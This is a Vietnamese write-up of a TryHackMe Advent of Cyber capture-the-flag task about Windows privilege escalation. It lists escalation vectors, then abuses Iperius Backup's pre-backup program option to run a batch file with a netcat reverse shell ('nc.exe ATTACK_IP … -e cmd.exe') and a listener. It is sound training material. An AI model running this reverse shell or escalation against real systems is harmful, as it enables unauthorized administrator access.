Task 18 [Day 13] Networking They Lost The Plan!
Câu chuyện
McSkidy nhận ra rằng cô ấy đã làm việc trên một bản phác thảo sơ bộ về kế hoạch khôi phục sau thảm họa nhưng đã khóa các quyền trên tệp để đảm bảo rằng nó được an toàn. Tuy nhiên, Grinch đã truy cập vào hệ thống cục bộ và giảm quyền đối với tài khoản của cô ấy. Bạn có thể nâng cao đặc quyền của cô ấy và lấy lại tệp không?
Mục tiêu học tập
- Hiểu các loại đặc quyền người dùng khác nhau trong Windows
- Các kỹ thuật leo thang đặc quyền khác nhau
- Khai thác lỗ hổng báo cáo đặc quyền
Trước khi bạn bắt đầu, vui lòng khởi động máy mục tiêu. Bạn có thể sử dụng quyền truy cập trong trình duyệt hoặc kết nối với nó qua RDP bằng thông tin đăng nhập bên dưới.
Username: mcskidy
Password: Password1
Leo thang
McSkidy đã đưa ra quyết định đúng đắn; Cuộc sống của bất kỳ tin tặc độc hại nào sẽ dễ dàng hơn khi họ kết nối với hệ thống có tài khoản đặc quyền. Một tài khoản đặc quyền (chẳng hạn như Quản trị viên trên hệ thống Windows hoặc Root trên hệ thống Linux) sẽ cho phép họ truy cập vào bất kỳ tệp nào trên hệ thống và thực hiện bất kỳ thay đổi nào họ cần. Một tài khoản có đặc quyền thấp hơn có thể khiến mọi thứ trở nên khó khăn hơn.
Grinch có hiểu biết khá tốt về an ninh mạng. Việc hạn chế đặc quyền tài khoản của McSkidy khiến quá trình phản hồi sự cố trở nên khó khăn hơn. Cô ấy có thể cần chạy các công cụ hoặc xóa bất kỳ tài khoản độc hại nào mà Grinch có thể đã tạo, nhưng một tài khoản có đặc quyền hạn chế sẽ khiến điều này không thể thực hiện được.
Trên một máy chủ Windows điển hình, bạn có thể tìm thấy một số loại tài khoản khác nhau; những điều này được tóm tắt dưới đây.
- Quản trị viên miền: Đây thường là cấp tài khoản cao nhất mà bạn sẽ tìm thấy trong doanh nghiệp cùng với Quản trị viên doanh nghiệp. Tài khoản có mức đặc quyền này có thể quản lý tất cả các tài khoản của tổ chức, các cấp truy cập của họ và hầu hết mọi thứ bạn có thể nghĩ đến. "Miền" là cơ quan đăng ký trung tâm được sử dụng để quản lý tất cả người dùng và máy tính trong tổ chức.
- Dịch vụ: Các tài khoản được phần mềm sử dụng để thực hiện các tác vụ của chúng, chẳng hạn như sao lưu hoặc quét chống vi-rút.
- Người dùng miền: Tài khoản thường được sử dụng bởi nhân viên. Những người này phải có đủ đặc quyền để thực hiện công việc hàng ngày của họ. Ví dụ: quản trị viên hệ thống có thể hạn chế khả năng cài đặt và gỡ cài đặt phần mềm của người dùng.
- Tài khoản cục bộ: Những tài khoản này chỉ hợp lệ trên hệ thống cục bộ và không thể được sử dụng trên miền.
Các tài khoản có thể được quản lý dễ dàng với các nhóm. Ví dụ: tài khoản McSkidy có thể được tạo như một người dùng thông thường và sau đó được thêm vào nhóm Quản trị viên miền, cấp cho nhóm này các đặc quyền của Quản trị viên miền.
Vectơ nâng cấp đặc quyền của Windows
Một số vectơ phổ biến có thể cho phép bất kỳ người dùng nào tăng mức đặc quyền của họ trên hệ thống Windows được liệt kê dưới đây.
- Thông tin đăng nhập được lưu trữ: Thông tin đăng nhập quan trọng có thể được người dùng lưu trong tệp hoặc trong tệp cấu hình của ứng dụng được cài đặt trên hệ thống đích.
- Khai thác hạt nhân Windows: Hệ điều hành Windows được cài đặt trên hệ thống đích có thể có một lỗ hổng đã biết có thể bị khai thác để tăng mức đặc quyền.
- Quyền đối với tệp / thư mục không an toàn: Trong một số trường hợp, ngay cả người dùng có đặc quyền thấp cũng có thể có đặc quyền đọc hoặc ghi đối với các tệp và thư mục có thể chứa thông tin nhạy cảm.
- Quyền đối với dịch vụ không an toàn: Tương tự như quyền đối với các tệp và thư mục nhạy cảm, người dùng có đặc quyền thấp có thể có quyền đối với dịch vụ. Những quyền này có thể hơi vô hại, chẳng hạn như truy vấn trạng thái dịch vụ (SERVICE_QUERY_STATUS) hoặc các quyền thú vị hơn như bắt đầu và dừng một dịch vụ (SERVICE_START và SERVICE_STOP, tương ứng).
- DLL Hijacking: Các ứng dụng sử dụng tệp DLL để hỗ trợ quá trình thực thi của chúng. Bạn có thể coi đây là những ứng dụng nhỏ hơn có thể được khởi chạy bởi ứng dụng chính. Đôi khi các tệp DLL bị xóa hoặc không có trên hệ thống được gọi bởi ứng dụng. Lỗi này không phải lúc nào cũng dẫn đến việc ứng dụng bị lỗi và ứng dụng vẫn có thể chạy. Tìm một tệp DLL mà ứng dụng đang tìm kiếm ở một vị trí mà chúng tôi có thể ghi vào có thể giúp chúng tôi tạo một tệp DLL độc hại sẽ được chạy bởi ứng dụng. Trong trường hợp như vậy, DLL độc hại sẽ chạy với mức đặc quyền của ứng dụng chính. Nếu ứng dụng có cấp đặc quyền cao hơn người dùng hiện tại của chúng tôi, điều này có thể cho phép chúng tôi khởi chạy trình bao có cấp đặc quyền cao hơn.
- Đường dẫn dịch vụ chưa được trích dẫn: Nếu đường dẫn thực thi của một dịch vụ chứa một khoảng trắng và không được đặt trong dấu ngoặc kép, thì một tin tặc có thể đưa các tệp thực thi độc hại của riêng họ vào để chạy thay vì tệp thực thi dự kiến.
- Luôn cài đặt nâng cao: Các ứng dụng Windows có thể được cài đặt bằng các tệp Windows Installer (còn được gọi là gói MSI). Các tệp này giúp quá trình cài đặt dễ dàng và đơn giản. Hệ thống Windows có thể được định cấu hình bằng chính sách "AlwaysInstallElended". Điều này cho phép quá trình cài đặt chạy với các đặc quyền của quản trị viên mà không yêu cầu người dùng phải có các đặc quyền này. Tính năng này cho phép người dùng cài đặt phần mềm có thể cần đặc quyền cao hơn mà không cần mức đặc quyền này. Nếu "AlwaysInstallEleised" được định cấu hình, một tệp thực thi độc hại được đóng gói dưới dạng tệp MSI có thể được chạy để có được mức đặc quyền cao hơn.
- Phần mềm khác: Phần mềm, ứng dụng hoặc tập lệnh được cài đặt trên máy đích cũng có thể cung cấp vectơ báo cáo đặc quyền.
Tốt nhất, McSkidy nên khám phá tất cả những điều này. Sự leo thang đặc quyền không có dấu đầu dòng màu bạc và vectơ sẽ hoạt động không chỉ phụ thuộc vào cấu hình của hệ thống đích mà trong một số trường hợp, vào hành vi của người dùng (ví dụ: tìm tệp mật khẩu.txt trên máy tính để bàn nơi người dùng ghi chú mật khẩu tài khoản). Trong một số trường hợp, bạn sẽ cần kết hợp hai hoặc nhiều vectơ để đạt được kết quả mong muốn.
Thu thập thông tin ban đầu
Thu thập thông tin là một bước quan trọng trong việc leo thang đặc quyền vì đây là cách bạn có thể phát hiện ra các vectơ tiềm năng. Một số tập lệnh tự động có sẵn để nhanh chóng liệt kê hầu hết các vectơ đã biết được liệt kê ở trên. Tuy nhiên, trong các cam kết thử nghiệm thâm nhập thực tế, bạn thường sẽ cần thực hiện một số nghiên cứu bổ sung dựa trên kết quả của các tập lệnh này.
Một số điểm chính trong cách liệt kê như sau:
Người dùng trên hệ thống mục tiêu. Lệnh net users sẽ liệt kê những người dùng trên hệ thống đích.
Phiên bản OS : Lệnh systeminfo | findstr /B /C: "OS Name"/C: "OS Version" sẽ xuất ra thông tin về hệ điều hành. Điều này sẽ được sử dụng để nghiên cứu thêm về việc liệu có tồn tại lỗ hổng báo cáo đặc quyền cho phiên bản này hay không.
Các dịch vụ đã cài đặt: Dùng lệnh wmic service list sẽ liệt kê các dịch vụ được cài đặt trên hệ thống đích.
Khi tham gia thực tế, bạn nên làm theo danh sách các lệnh mở rộng hơn được cung cấp trong Phòng leo thang đặc quyền của Windows của chúng tôi.
Khai thác
Dịch vụ sao lưu Iperius gặp phải lỗ hổng bảo mật. McSkidy có thể sử dụng nó để nâng cao đặc quyền của mình trên hệ thống. Khi Iperius Backup được cài đặt dưới dạng một dịch vụ, nó có thể được định cấu hình để chạy các tác vụ sao lưu với đặc quyền của quản trị viên ngay cả khi người dùng hiện tại có mức đặc quyền thấp hơn.
Chúng ta cùng tìm hiểu các bước khai thác:
1) Tạo một nhiệm vụ sao lưu mới: Bản thân nhiệm vụ không quan trọng. Bạn có thể đặt đường dẫn sao lưu là C: \Users\McSkidy\Documents
2) Đặt điểm đến: Từ tab đích, bạn có thể đặt vị trí nơi bản sao lưu sẽ được ghi. Một lần nữa, điều này không quan trọng; bạn có thể đặt nó thành C:\Users\McSkidy\Desktop
3) Các quy trình khác: Tab "quy trình khác" là quan trọng. Như bạn có thể thấy, điều này cung cấp cho chúng tôi tùy chọn để đặt chương trình chạy trước hoặc sau mỗi quá trình sao lưu. Khi quá trình sao lưu được chạy với đặc quyền của quản trị viên, bất kỳ chương trình hoặc tệp bên ngoài nào được định cấu hình ở đây sẽ được chạy với đặc quyền của quản trị viên. Để khai thác điều này, chúng tôi sẽ tạo một tệp dơi đơn giản và đặt nó chạy trước khi sao lưu.
Tệp .bat sẽ khởi chạy một trình bao bằng tiện ích nc.exe (có vị trí thuận tiện tại C:\Users\McSkidy\Downloads\nc.exe). Khởi chạy trình soạn thảo văn bản Notepad và nhập các dòng mã sau.
@echo off
C:\Users\McSkidy\Downloads\nc.exe ATTACK_IP 1337 -e cmd.exe
Bạn sẽ cần thay thế "ATTACK_IP" bằng địa chỉ IP của máy tấn công của mình; chúng tôi khuyên bạn nên khởi động AttackBox (nút màu xanh lam ở đầu trang này).
Bạn có thể lưu tệp dưới dạng evil.bat trên màn hình nền của hệ thống đích (MACHINE_IP) và chọn tệp đó bằng cách bật tùy chọn "run a program or open external file". Nhấp vào OK, và bạn sẽ thấy một công việc sao lưu có tên "documents" trên bảng điều khiển Iperius.
4) Khởi chạy trình lắng nghe: Tệp evil.bat sẽ khởi chạy cmd.exe và kết nối trở lại với máy tấn công của chúng ta trên cổng 1337. Chúng ta nên có một trình lắng nghe sẵn sàng chấp nhận kết nối đến này. Bạn có thể khởi chạy nc con máy tấn công của mình bằng lệnh nc -nlvp 1337.
5) Chạy dưới dạng dịch vụ: Nhấp chuột phải vào công việc sao lưu "documents" đã tạo trước đó và chọn tùy chọn "Run backup as service option".
6) Chúc một Giáng sinh an lành! Trong vòng một phút hoặc lâu hơn, bạn sẽ thấy một kết nối đến trong cuộc tấn công của bạn
Đọc thêm
Nâng cao đặc quyền là một chủ đề quan trọng cho các bài kiểm tra thâm nhập và các kỳ thi chứng chỉ chuyên môn khác nhau. Bạn có thể truy cập các phòng bên dưới để tìm hiểu thêm về các kỹ thuật khác nhau được sử dụng để nâng cấp đặc quyền:
Sau khi triển khai máy ảo bạn thực hiện đăng nhập vào hệ thống
Mở cmd dùng lệnh net users
Sử dụng lệnh kiểm tra dịch vụ đang chạy để có đáp án
What backup service did you find running on the system?
Tìm đường dẫn thực thi lệnh backup đó mình xem lại nội dung tìm tên dịch vụ backup là có kết quả
What is the path of the executable for the backup service you have identified?
Thực hiện tấn công, sử dụng lệnh nc
Trên máy kali mình bật lắng nghe cổng 5555
Trên máy victim tạo một tệp tin .bat với nội dung
@echo off
C:\Users\McSkidy\Downloads\nc.exe ATTACK_IP 5555 -e cmd.exe
Tiếp tục ở máy victim ta chạy dịch vụ backup
Mình tạo một job backup mới
Tạo thư mục backup
Tạo thư mục lưu bản backup
Thêm một tiến trình ở tab Other process để chạy shell.bat
Chạy backup đó bạn sẽ thu được kết nối ngược ở máy kali
Run the whoami command on the connection you have received on your attacking machine. What user do you have?
Tìm kiếm thư mục và thấy flag.txt
What is the content of the flag.txt file?
The Grinch forgot to delete a file where he kept notes about his schedule! Where can we find him at 5:30?
![Advent of Cyber 2 [2020] - Tryhackme - Write Up - Day 1](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLeXq7qj1vf7kjbSrUV-Q4iHtFE4W6cB1LFOWeuCvPqUIfsbJmzQk4xeZzqkKKz8t4mdohTiFeVTuXfpxKbZGp1OHj-KzpaOTJ7oB4ISB0lAR5ckzGMxY4rJyTYkBNySjgyYHyxXRiX9p0/w72-h72-p-k-no-nu/)
0 Comments